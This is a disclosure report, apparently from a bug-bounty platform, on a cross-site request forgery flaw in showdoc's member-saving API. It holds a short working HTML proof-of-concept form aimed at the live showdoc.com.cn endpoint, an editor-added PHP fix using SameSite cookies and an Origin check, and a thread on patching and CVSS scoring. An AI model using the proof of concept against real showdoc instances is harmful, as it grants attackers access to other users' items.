Cross-Site Request Forgery (CSRF) in star7th/showdoc
Reported on
Aug 3rd 2021
✍️ Description
With this CSRF vulnerability an attacker is able to add any member to any item if a logged-in user visits the attacker's site.
🕵️♂️ Proof of Concept
1. Open PoC.html in Firefox or Safari.
2. Now you can check that the member with the email address evil@mail.com (which must already be registered beforehand) has access to the item with id 1531601670203340.
// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://www.showdoc.com.cn/server/index.php?s=/api/member/save" method="POST">
<input type="hidden" name="item_id" value="1531601670203340" />
<input type="hidden" name="username" value="evil@mail.com" />
<input type="hidden" name="cat_id" value="0" />
<input type="hidden" name="member_group_id" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
💥 Impact
This vulnerability can expose any item to an attacker-chosen member.
Fix
Set the SameSite attribute of the session cookies to Lax or Strict, so the browser does not attach them to cross-site POST requests such as the one in the PoC.
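The following is an added example of the recommended fix, written by the editor for this page; it is not code from showdoc or its maintainers. It assumes PHP 7.3 or newer (the array form of session_set_cookie_params) and a request handler that runs before the s=/api/member/save logic. Beyond the SameSite setting the report recommends, it adds a defence-in-depth check that compares the request's Origin (or Referer) host with the Host header the request arrived at, which needs no per-deployment domain configuration; that check goes beyond the page's stated fix and is the editor's addition.

```php
<?php
// Added example, not showdoc's code. Assumes PHP >= 7.3.

// Issue the session cookie with SameSite so browsers omit it on
// cross-site POSTs like the one in the PoC form above.
function configure_session_cookie(bool $https): void
{
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'domain'   => '',      // current host only; no deployment-specific value needed
        'secure'   => $https,  // Lax/Strict do not require Secure, but use it over HTTPS
        'httponly' => true,
        'samesite' => 'Lax',   // 'Strict' also blocks cookies on top-level GET navigations
    ]);
    session_start();
}

// Defence in depth (editor's addition): accept a state-changing request only
// if its Origin/Referer host matches the Host the request was sent to. Both
// values come from the request itself, so a self-hosted instance with a
// user-defined domain needs no configured allow-list.
function is_same_origin_request(array $server): bool
{
    $host   = $server['HTTP_HOST'] ?? '';
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    if ($host === '' || $source === '') {
        return false; // fail closed when the browser sent neither header
    }
    $parts = parse_url($source);
    if ($parts === false || empty($parts['host'])) {
        return false;
    }
    // Browsers include a port in Origin only when it is non-default,
    // which mirrors how the Host header is formed.
    $sourceHost = $parts['host'] . (isset($parts['port']) ? ':' . $parts['port'] : '');
    return strcasecmp($sourceHost, $host) === 0;
}

// Illustrative wiring for a POST handler such as s=/api/member/save.
configure_session_cookie(!empty($_SERVER['HTTPS']));
if ($_SERVER['REQUEST_METHOD'] === 'POST' && !is_same_origin_request($_SERVER)) {
    http_response_code(403);
    exit('cross-origin request rejected');
}
```

With SameSite=Lax the PoC's cross-site POST arrives without the victim's session cookie and is treated as unauthenticated; the origin check rejects it outright even in browsers that do not enforce SameSite.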
@admin hey man, how are you doing now? I hope you're fine...
Are you able to send a message to the maintainer?
We will get around to reaching out to the maintainer today! Cheers.
@admin dear Jamie, you reached them before, as two reports were validated yesterday.
But I will only fix it on the official website https://www.showdoc.com.cn/. The open source showdoc https://github.com/star7th/showdoc may not be fixed. Because the domain name of the open source showdoc is user-defined, it cannot be written into the code's filtering rules. If the user is allowed to configure it themselves, the configuration complexity increases. I prefer that showdoc can be used out of the box.
Considering that the open source version of showdoc is mostly used for intra-team collaboration, the impact of this problem is relatively small.
@admin I think, according to the showdoc team's comments, we should change the impact from high to low. Thanks.
The official website https://www.showdoc.com.cn/ has been repaired. You can test it.
@amammad - can you suggest a new CVSS score and vector string? I will update accordingly.
Furthermore, @maintainer, if you could confirm the commit SHA that fixes this vulnerability, that would be great!
@admin
The Confidentiality and Integrity should be Low and Availability should be None. All other items can remain as before.
The new CVSS score can be 4.5, which is the lowest score for any CSRF.
@amammad - I have changed the vector items as requested, and this adjusts the score to 5.4?
@maintainer - just a heads up that 28 days have passed since validation.
Are you happy for us to make this report live and for us to publish a CVE, or do you have a patch prepared for this?
Would you like to extend the embargo date?
